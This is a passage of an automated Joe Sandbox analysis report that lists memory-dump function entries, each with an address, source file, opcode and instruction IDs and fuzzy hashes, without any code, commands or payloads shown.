                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b9dca367457ce0018f77dec4bae09e5219c7636abd1b13c6d247ee0928654119
                                              • Instruction ID: 59c2fc273ba36fc63551cbf69d4a7b43a6618d6c74534229ab3f4c7b0de43b9a
                                              • Opcode Fuzzy Hash: b9dca367457ce0018f77dec4bae09e5219c7636abd1b13c6d247ee0928654119
                                              • Instruction Fuzzy Hash: 1521379190EB864FE3669B7858991E43FA0DF4B21071842E7E44CCB1D3DE1CD81E83D5
                                              Function 00007FFAACCF7645 Relevance: .1, Instructions: 82COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9d23ed0c15b7b501735686258a02bbead5aea9030119fbbc7743d2d8337e10a7
                                              • Instruction ID: cdbaaa2f835b3e3ac34a38e8d63928e7c971eecfe42a63909754544b0cfb4439
                                              • Opcode Fuzzy Hash: 9d23ed0c15b7b501735686258a02bbead5aea9030119fbbc7743d2d8337e10a7
                                              • Instruction Fuzzy Hash: 5B11B4317099098FE7D4D76CD49867177D1EFD9311B1841BAD45CC72A5ED25FC868380
                                              Function 00007FFAACCE3F65 Relevance: .1, Instructions: 81COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 23779cfb445b8a3bda58cca9b04ade6bb422f9c60fd8f85ac7ae74d8fe2fa13f
                                              • Instruction ID: 49d73aeb3f1f7dd840bff1f54a0bf4c3ca6439d7e9d75bd5a58095fc69acb7f8
                                              • Opcode Fuzzy Hash: 23779cfb445b8a3bda58cca9b04ade6bb422f9c60fd8f85ac7ae74d8fe2fa13f
                                              • Instruction Fuzzy Hash: 2311AE22D0A99ACEF7B0EBA848152B976D1EF8B311F4481B5D41DC3582DF18A91F06C1
                                              Function 00007FFAACCF9F02 Relevance: .1, Instructions: 80COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2fa12cfa7886183428277375ec4eb6cf83c1a19a7aef4b793052066eb17926a2
                                              • Instruction ID: 78cea7025c4e345b4ce413996cfb7775887f80b8a2b5a943a8489a85f4b3f53e
                                              • Opcode Fuzzy Hash: 2fa12cfa7886183428277375ec4eb6cf83c1a19a7aef4b793052066eb17926a2
                                              • Instruction Fuzzy Hash: 8D218322D0EB9A8AFF659B2858116FD76D0EF87328F0481B6D45EC35D2DE1CA81D46C1
                                              Function 00007FFAACCF7680 Relevance: .1, Instructions: 79COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8b7502b6322fe269cd383489d6ec0d1f7688e1b31ba07c8e3c981c10023bbb4b
                                              • Instruction ID: a1eb8db60a9ecf0bfce7c04d6fb73eb1b2fec90b219be0763b2d9c90d502f9ee
                                              • Opcode Fuzzy Hash: 8b7502b6322fe269cd383489d6ec0d1f7688e1b31ba07c8e3c981c10023bbb4b
                                              • Instruction Fuzzy Hash: 5E219A707199099FEA94EB2CC458F65B3E1FF59310F5041BAD46EC72A2DE24EC858780
                                              Function 00007FFAACCE841A Relevance: .1, Instructions: 79COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7038e3e526a3f724da8c321972cae3a3663cef103870331b189cf67d7a2ef82d
                                              • Instruction ID: b08a71de4308e6289f768cf8d491ce7ba7c62f8cf913d1ad93acd1329b150676
                                              • Opcode Fuzzy Hash: 7038e3e526a3f724da8c321972cae3a3663cef103870331b189cf67d7a2ef82d
                                              • Instruction Fuzzy Hash: 7721C522D0E99E89F7B19B2C58211B977E1EF87310F4481BAD45DC3883DF18AA1D46C1
                                              Function 00007FFAACCF3CF2 Relevance: .1, Instructions: 78COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f9862756aba2b8f7403d1e6dd40b489016b21b19f7cc8d8142bd7e370be3372b
                                              • Instruction ID: a52111f3c80d9ecad84d3234c6833f2822c5cbc404df1e24279ef15a2c9a3c35
                                              • Opcode Fuzzy Hash: f9862756aba2b8f7403d1e6dd40b489016b21b19f7cc8d8142bd7e370be3372b
                                              • Instruction Fuzzy Hash: 1721C529D2E75AAAF7A99B2C44052F97AE0EF86358F0C81F6D45CC7083DE18A80D46D1
                                              Function 00007FFAACCFA2AB Relevance: .1, Instructions: 78COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c67ce1b40895accb9c9062fb3b198a32b2e90453e350fb694b5579ef6522f143
                                              • Instruction ID: cb315ea2ee0322220936f1a63a85927b4bb0fe86d629a4ee34a73707faefe235
                                              • Opcode Fuzzy Hash: c67ce1b40895accb9c9062fb3b198a32b2e90453e350fb694b5579ef6522f143
                                              • Instruction Fuzzy Hash: 8C213B8191EB868BF7499738485A6B57FA1EF13604F4440FAD04EC7197ED58EC0983D2
                                              Function 00007FFAACCEFAD5 Relevance: .1, Instructions: 78COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0dd67b1d70d42e2342eb3f6172f677c13504cf606bfdd6d6d209117121c1e940
                                              • Instruction ID: e4288e26e39dace54fb432a1cdb3588fe58981565d441a63d3397d8d5c06b442
                                              • Opcode Fuzzy Hash: 0dd67b1d70d42e2342eb3f6172f677c13504cf606bfdd6d6d209117121c1e940
                                              • Instruction Fuzzy Hash: E421C332D0A99E8AF760BB2848256F97691EF8B320F4441B6D45CC34C3DF18E90D46C1
                                              Function 00007FFAACCF148A Relevance: .1, Instructions: 78COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f1c318e7cd2fa3b99105b34c67b4a14c1966b58eabc15351227c6b90f74faea7
                                              • Instruction ID: b5cddaa704dc5aa0e5d3b6692a810c09cbf44a3945c94a8e38ed360009f4e084
                                              • Opcode Fuzzy Hash: f1c318e7cd2fa3b99105b34c67b4a14c1966b58eabc15351227c6b90f74faea7
                                              • Instruction Fuzzy Hash: B221F636D0AB9ECAF7669B7858112F976D1EF8A328F509176D41EC3482DD18A90E06C1
                                              Function 00007FFAACCE6C19 Relevance: .1, Instructions: 78COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1b51c37c505fbeeaf791968503fb5b5cada3726d14002104cb7fd26e11800631
                                              • Instruction ID: fb82bfa0effd8bb543ce8056fff03fb4a33166a809d93122893b5958aa147b30
                                              • Opcode Fuzzy Hash: 1b51c37c505fbeeaf791968503fb5b5cada3726d14002104cb7fd26e11800631
                                              • Instruction Fuzzy Hash: 1421D866D1EB4A9FFB915F6858552A03FE0DF1B640B0480F2D48CC7183DB18AD5D43D2
                                              Function 00007FFAACCEC0CB Relevance: .1, Instructions: 77COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 285c24780036dbc121f5956a48c1e182dadeffaa2f1626adf698801ca1970646
                                              • Instruction ID: 89d0f6c2cce29bee678b10b871aa32f8c138fe2fe0d130b848ce763b6904174c
                                              • Opcode Fuzzy Hash: 285c24780036dbc121f5956a48c1e182dadeffaa2f1626adf698801ca1970646
                                              • Instruction Fuzzy Hash: F4215E74918A4E8FDB84EF58C498AE973A1FF69300F544579D41EC7295DF35E842CB80
                                              Function 00007FFAACCF3BCD Relevance: .1, Instructions: 77COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cb61dc573b9b96f01b64b07c971d933d53a6afa7739e59292252376b6f83079e
                                              • Instruction ID: 1fd41c628a95f2e114e74217bd68ae409654b56d108f48c937616cfccd947d7b
                                              • Opcode Fuzzy Hash: cb61dc573b9b96f01b64b07c971d933d53a6afa7739e59292252376b6f83079e
                                              • Instruction Fuzzy Hash: 8321DF6081E7C85FDB4B9B3888249A5BFF0DF47244B1C45EBD088CF1A3C8246989C3A3
                                              Function 00007FFAACCE7C85 Relevance: .1, Instructions: 76COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2f978854b86042adca4eb85955e25c852eb6858a5ddbe2e2daa562e24599f6c4
                                              • Instruction ID: d7c7b5a2985fa35d962a75bc37bf4d3da06e36b0bf8edf3c4d79101e2f16a9e3
                                              • Opcode Fuzzy Hash: 2f978854b86042adca4eb85955e25c852eb6858a5ddbe2e2daa562e24599f6c4
                                              • Instruction Fuzzy Hash: 51210A7284E2855FD742DBB4CC55AE97FF4EF47210B0581E7E088C7193C62C5906C7A1
                                              Function 00007FFAACCF463D Relevance: .1, Instructions: 75COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 57e98d902fb50035219f39f2223b14802093c166441d70499f8197d14d660d37
                                              • Instruction ID: 3ebfbc58a28367de8c9a55bf8d21c8cf6789426c91217dc0a7b74123c586dd7e
                                              • Opcode Fuzzy Hash: 57e98d902fb50035219f39f2223b14802093c166441d70499f8197d14d660d37
                                              • Instruction Fuzzy Hash: D521CF26C0EB9A8AF764DB2848116F976E0EF8B359F4581B6D40DC3583DD18E91E86C1
                                              Function 00007FFAACCFAF09 Relevance: .1, Instructions: 74COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6029d57b773f81f64dbb8c758753e7cadeee4c589b8cab4d1e4eb313e993a0c7
                                              • Instruction ID: b48111e53a4fb2c4fcce4c3ac71a8def77a097dfb35824c060f697132c9b3a43
                                              • Opcode Fuzzy Hash: 6029d57b773f81f64dbb8c758753e7cadeee4c589b8cab4d1e4eb313e993a0c7
                                              • Instruction Fuzzy Hash: C8210B61D0DB5A8AF7755B2448116F9B6E0EF4A718F4441B6D40CD74C3EE28A80D46D1
                                              Function 00007FFAACCEF809 Relevance: .1, Instructions: 74COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8565164937e05b42eff73e4cbf3bddd20a10c9daf36693ce0bd84c3345b8282f
                                              • Instruction ID: 2f20dd04a484018625893d0419e01c61b63ee5046a6ce0d9686bc414b93d5209
                                              • Opcode Fuzzy Hash: 8565164937e05b42eff73e4cbf3bddd20a10c9daf36693ce0bd84c3345b8282f
                                              • Instruction Fuzzy Hash: 2711C036D0AA5E8AF7B59B2448122F976E0EF8B320F4441B6D41CC34C3EF18E90E46C1
                                              Function 00007FFAACCF5E48 Relevance: .1, Instructions: 73COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 94432b46ceb654aa9f3caedef0b7eeb322b3fc8b1ee6d19e8fe532ad8f2f313d
                                              • Instruction ID: 1370794e9754e64bd4366a7f261c6a93be805abcbb17f526487f5002fecb1a52
                                              • Opcode Fuzzy Hash: 94432b46ceb654aa9f3caedef0b7eeb322b3fc8b1ee6d19e8fe532ad8f2f313d
                                              • Instruction Fuzzy Hash: A3116A30718A088FDBE4EB2CC448B61B7E0FFA9314B1046A9E84DC76A1DB65F844C780
                                              Function 00007FFAACD00088 Relevance: .1, Instructions: 73COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 876c1be21df5df25401bb51b9ab17e64afa4d2117a39e15da07f5f2b3eec73a9
                                              • Instruction ID: eb6d4c02076efb0780ed4b01931c10b5ac85af44366182851aca267ce5c5e1de
                                              • Opcode Fuzzy Hash: 876c1be21df5df25401bb51b9ab17e64afa4d2117a39e15da07f5f2b3eec73a9
                                              • Instruction Fuzzy Hash: 56110570B18E468FE6A8DB2CC055662B3D1FF99310B508779D02EC32C6DF38E8428780
                                              Function 00007FFAACCF6CC0 Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 55c2d847f47c826a70fe58c7bbb70b376cae5f6e50e20d140f84c6762523a982
                                              • Instruction ID: 642b8c485c7790cc3551116d9d58dd9e8d0e3070e71b3362fae69c2b23c9380b
                                              • Opcode Fuzzy Hash: 55c2d847f47c826a70fe58c7bbb70b376cae5f6e50e20d140f84c6762523a982
                                              • Instruction Fuzzy Hash: 88112151E2DB1A0AF228572C90657FA66C1EF59368F60417EE4DF831C3DC08E80642D1
                                              Function 00007FFAACCF589B Relevance: .1, Instructions: 71COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: db6ccc1ed9247e8a1b5ffe0bf52d2914bac2e663665f704aa5a2b31f96250db9
                                              • Instruction ID: 26e020899df698d7d1f10632925d72fc7ca191dafb2b05099a40d5c835915871
                                              • Opcode Fuzzy Hash: db6ccc1ed9247e8a1b5ffe0bf52d2914bac2e663665f704aa5a2b31f96250db9
                                              • Instruction Fuzzy Hash: C021F32050E7C68FE70A5B3458651B87FB1EF13324B2941FFC48ACB493EA19A95AC3D1
                                              Function 00007FFAACCEF0B8 Relevance: .1, Instructions: 70COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fdf41df88ea580655d4a7972feba46ed32e3f71d1f79038709f6db9f6d5f7cd7
                                              • Instruction ID: cfcf28202f7fa50734caf8e77dfc9e5ecb1042fabfb0bf63d5b967ec42d7bb78
                                              • Opcode Fuzzy Hash: fdf41df88ea580655d4a7972feba46ed32e3f71d1f79038709f6db9f6d5f7cd7
                                              • Instruction Fuzzy Hash: AD119036D0AB5EE9F7B0AB2848016FAB9D1EF8A719F5081B7D41DC24C2DD1CAD0E09C1
                                              Function 00007FFAACCEF218 Relevance: .1, Instructions: 70COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: efdb1535794439fc492ef7547d1aeb43f996afc537c7b8bf30dc4bcea0307625
                                              • Instruction ID: 10d2bd2968b6455c74e3cda9ef660102cb6f15708af60420a5993f7d8e198986
                                              • Opcode Fuzzy Hash: efdb1535794439fc492ef7547d1aeb43f996afc537c7b8bf30dc4bcea0307625
                                              • Instruction Fuzzy Hash: 2B110432D0AB9E8AF7B5AF2898016FD71D5EF8A328F509175D41FC34C2DD19A90E05C1
                                              Function 00007FFAACCF722D Relevance: .1, Instructions: 70COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f5df06372082579b196aefe10210ed0c84980160aef7767a0397b21c96715422
                                              • Instruction ID: 00bb77bef9d0e1c321466880a05ba27bf0ebadd9b2df1c75a65cdc96c2e1f07b
                                              • Opcode Fuzzy Hash: f5df06372082579b196aefe10210ed0c84980160aef7767a0397b21c96715422
                                              • Instruction Fuzzy Hash: 7311E311B1EA9A9EF621972D68509BF3BD0DF86224B04C2BAD89DC7186CD08D80E82D1
                                              Function 00007FFAACD08780 Relevance: .1, Instructions: 67COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 94c733e7a98543016ed892cc15b125671ed9ffc0797b019bd3c6f87c39e1fb5d
                                              • Instruction ID: e815ebc3490d1a2738979ccbde28976ca002e3305285e9fe499f7d5e265add28
                                              • Opcode Fuzzy Hash: 94c733e7a98543016ed892cc15b125671ed9ffc0797b019bd3c6f87c39e1fb5d
                                              • Instruction Fuzzy Hash: 0B11062060E7449FE3599728DC45A72BBE4CF8B320B14C0BEE48EC7163C525AC4AC3D1
                                              Function 00007FFAACD1A840 Relevance: .1, Instructions: 66COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 36c17fd6014326f34f1be35c9b6d28f64712407d958b39905624d73786447444
                                              • Instruction ID: fa76b59a15c56917fc20dc972bb86762e21f899203c3ac79c003dfc2eb2f0817
                                              • Opcode Fuzzy Hash: 36c17fd6014326f34f1be35c9b6d28f64712407d958b39905624d73786447444
                                              • Instruction Fuzzy Hash: AA119130B19E168FFAA9973844446B5B2E1FF99304F54847DC02EC7194DE25E84B8380
                                              Function 00007FFAACCF7690 Relevance: .1, Instructions: 65COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 20a6e50bfffef9b158bbfeef1812001e535b3713c2371ba7b630491a40cb07f8
                                              • Instruction ID: c7a05a3a270af5d0113888630ded640aa3c2eff4f6e539bcd8905614a4aa7c1b
                                              • Opcode Fuzzy Hash: 20a6e50bfffef9b158bbfeef1812001e535b3713c2371ba7b630491a40cb07f8
                                              • Instruction Fuzzy Hash: 2611407150D91A8FE794EB2CD411AF57BE0EF5A314B0C01B6E44DC7157E624D88587C2
                                              Function 00007FFAACCEE599 Relevance: .1, Instructions: 63COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3cecfb2765a3994200329c2e6af62e06c9ecb32f9747b953b169981a736b6f56
                                              • Instruction ID: fad5b2a2399b84b0734651969e9f3045e9a224b7995746c77a01469703edb812
                                              • Opcode Fuzzy Hash: 3cecfb2765a3994200329c2e6af62e06c9ecb32f9747b953b169981a736b6f56
                                              • Instruction Fuzzy Hash: 3D11B27461594ECFDB88EF18C494AAA73F2FF69300B504569D41DC7255CB34EC56CB81
                                              Function 00007FFAACCF5690 Relevance: .1, Instructions: 63COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cf5322a0e56fb6c4f9b0ebdc475e0dba961865a996c364b35c0d99c699d11a77
                                              • Instruction ID: 682fe48cda7a7e00b585c5884e53382c2d24f74308d888d77b04a554b6f5c38a
                                              • Opcode Fuzzy Hash: cf5322a0e56fb6c4f9b0ebdc475e0dba961865a996c364b35c0d99c699d11a77
                                              • Instruction Fuzzy Hash: EA018952E1EB454FF7919738840A1A93BD0CF95258F0445B7D58DC32E2FD08DC4A03C1
                                              Function 00007FFAACCFE2E8 Relevance: .1, Instructions: 61COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a53b14894c52f0c20edded5d31d1f81ff3c7a30a7fb63fe3a9fbf07b8ed78792
                                              • Instruction ID: 09856d4526c87ae7cf3e8c65da477c1a366721a3f469ea7e34a462ad7714cec5
                                              • Opcode Fuzzy Hash: a53b14894c52f0c20edded5d31d1f81ff3c7a30a7fb63fe3a9fbf07b8ed78792
                                              • Instruction Fuzzy Hash: 3501F762B3CE450BA26CB62CA4495B6B7D0EF5932571040BFE02FC3597EC14EC4642C0
                                              Function 00007FFAACCF8DAC Relevance: .1, Instructions: 60COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5c80245d10921c9c45dad5f087f00ddb7d7fc71ada7c6109fcec1a6d2418b5e9
                                              • Instruction ID: 8469103305b7d3b336dab8356e35bb7a86c1397ba29a4567216f78692c38c2ab
                                              • Opcode Fuzzy Hash: 5c80245d10921c9c45dad5f087f00ddb7d7fc71ada7c6109fcec1a6d2418b5e9
                                              • Instruction Fuzzy Hash: 1911403681E7CC8FE702AB3488104E9BFB0EF43304F0100E7E45DCB0A3EA245A1983A2
                                              Function 00007FFAACD2C510 Relevance: .1, Instructions: 60COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2043a4c62dede48f11b7bab77146506ed8771e9a6e81b211ba85b6555c384ecf
